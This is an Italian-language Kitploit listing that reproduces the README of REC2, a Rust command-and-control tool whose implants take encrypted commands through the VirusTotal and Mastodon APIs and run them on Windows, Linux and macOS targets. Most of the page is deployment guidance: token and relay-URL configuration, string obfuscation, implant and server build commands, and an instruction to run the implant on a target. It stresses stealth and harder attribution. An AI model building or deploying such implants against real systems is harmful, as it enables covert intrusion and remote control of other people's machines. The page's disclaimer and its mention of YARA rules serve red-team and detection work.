Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
REC2 — REC2 (Rusty External Command and Control) è uno strumento client e server che consente all'auditor di eseguire comandi dalle API VirusTotal e Mastodon scritto in Rust. 🦀 | Kitploit
Strumenti/GitHubGitHub/g0h4n/rec2
Post-ExploitPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubg0h4n/rec2

REC2

REC2 (Rusty External Command and Control) è uno strumento client e server che consente all'auditor di eseguire comandi dalle API VirusTotal e Mastodon scritto in Rust. 🦀

Vedi Repository
16222142 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

:shipit: Informazione: REC2 è un vecchio progetto personale (inizio 2023) su cui non ho continuato lo sviluppo. Fa parte di una lista di progetti che mi hanno aiutato a imparare Rust. Il codice è probabilmente considerato obsoleto e non nella sua forma migliore. Forse riprenderò da dove ho lasciato #roadmap. Tuttavia, REC2 è completamente funzionante e permette di eseguire comandi su un target Linux / macOS o Windows tramite le API di VirusTotal e Mastodon.

REC2 (Rusty External C2)

GitHub Windows supported Linux supported macOS supported Twitter Follow

logo

⚠️ Disclaimer: REC2 è solo a scopo educativo. Usalo a tua discrezione, non posso essere ritenuto responsabile per eventuali danni causati. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Non mi assumo alcuna responsabilità e non sono responsabile per qualsiasi uso improprio o danno causato da questo strumento.

🔴 Redteamer: Condivido con te una versione beta di uno dei miei C2 esterni che utilizzano VirusTotal e Mastodon.

🔵 Blueteamer: Puoi trovare un esempio di regole YARA per gli implant di REC2 in questo stesso repository.

🧮 Riepilogo

  • Descrizione
  • Utilizzo e Demo
  • Come compilarlo?
    • Usando il Makefile
    • Usando il Dockerfile
  • Roadmap
  • Collegamenti

🏷️ Descrizione

REC2, o Rusty External Command and Control, è uno strumento versatile di Command and Control (C2) sviluppato nel linguaggio di programmazione Rust. Fornisce un mezzo discreto ed efficace per gestire implant remoti (client) su sistemi macOS, Linux e Windows. REC2 utilizza API di terze parti come VirusTotal o Mastodon per trasmettere messaggi crittografati con AES tra il server e gli implant, consentendo agli attaccanti di operare in modo furtivo attraverso questi canali esterni. Gli implant possono monitorare i job in sospeso, recuperarli, decrittarli, eseguire attività sul sistema target e trasmettere in modo sicuro i risultati tramite le stesse API. L'uso di queste API come intermediari aggiunge un ulteriore livello di anonimizzazione, riducendo la facilità di risalire all'attaccante.

schema

📺 Utilizzo e Demo

server client.exe

Modifica alcuni valori in implants/(mastodon,virustotal)/src/main.rs :

// (MASTODON or VIRUSTOTAL) TOKEN 
// <https://mastodon.be/settings/applications>
// <https://developers.virustotal.com/reference/authentication>
let token = lc!("TOKEN").to_owned();
// (MASTODON or VIRUSTOTAL) FULL URL
//let full_url = lc!("https://mastodon.xx/@username/100123451234512345").to_owned();
let full_url = lc!("https://www.virustotal.com/gui/file/99ff0b679081cdca00eb27c5be5fd9428f1a7cf781cc438b937cf8baf8551c4d").to_owned();

Genera il binario statico implant Windows x64:

make virustotal_windows
make mastodon_windows

Puoi trovare (rec2_virustotal_x64.exe o rec2_mastodon_x64.exe) nella tua directory corrente.

E per finire, compila il binario server:

make c2server_release
./server_release -h
./server_release VirusTotal -h
./server_release Mastodon -h

# Example
./server_release VirusTotal --url <URL> --token <TOKEN> --key <AES_KEY>

Ora devi solo eseguire l'implant sul tuo target.

🚜 Come compilarlo?

Usando il Makefile

Puoi usare il comando make per compilarlo per Linux, Windows o mac0S.

Altri comandi nel Makefile:

REC2 Server:
usage: make c2server_debug
usage: make c2server_release
usage: make c2server_windows
usage: make c2server_windows_x64
usage: make c2server_windows_x86
usage: make c2server_linux
usage: make c2server_linux_aarch64
usage: make c2server_linux_x86_64
usage: make c2server_macos
usage: make c2server_arm_musl
usage: make c2server_armv7

VirusTotal implant:
usage: make virustotal_debug
usage: make virustotal_release
usage: make virustotal_windows
usage: make virustotal_windows_x64
usage: make virustotal_windows_x86
usage: make virustotal_linux
usage: make virustotal_linux_aarch64
usage: make virustotal_linux_x86_64
usage: make virustotal_macos
usage: make virustotal_arm_musl
usage: make virustotal_armv7

Mastodon implant:
usage: make mastodon_debug
usage: make mastodon_release
usage: make mastodon_windows
usage: make mastodon_windows_x64
usage: make mastodon_windows_x86
usage: make mastodon_linux
usage: make mastodon_linux_aarch64
usage: make mastodon_linux_x86_64
usage: make mastodon_macos
usage: make mastodon_arm_musl
usage: make mastodon_armv7

Dependencies:
usage: make install_windows_deps
usage: make install_macos_deps

Documentation:
usage: make c2server_doc
usage: make virustotal_doc
usage: make mastodon_doc

Cleaning:
usage: make clean

Usando il Dockerfile

Compila REC2 con Docker per assicurarti di avere tutte le dipendenze.

docker build --rm -t rec2 .

# Then to build C2 server:
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_windows
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_linux
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_macos


# Then to build VirusTotal implant:
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_windows
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_linux
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_macos

# Then to build Mastodon implant:
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_windows
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_linux
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_macos
SHOW MORE

Usando Cargo

Dovrai installare Rust sul tuo sistema.

https://www.rust-lang.org/fr/tools/install

:warining: Devi esportare la variabile LITCRYPT_ENCRYPT_KEY nel tuo terminale prima di compilarlo. (per l'offuscamento delle stringhe degli implant)

export LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"
LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"

:warining: Devi modificare AESKEY in implants/(virustotal,mastodon)/main.rs e cambiare URL e TOKEN.

Ecco come compilare le versioni "release" e "debug" usando il comando cargo.

git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal
Scarica lo strumento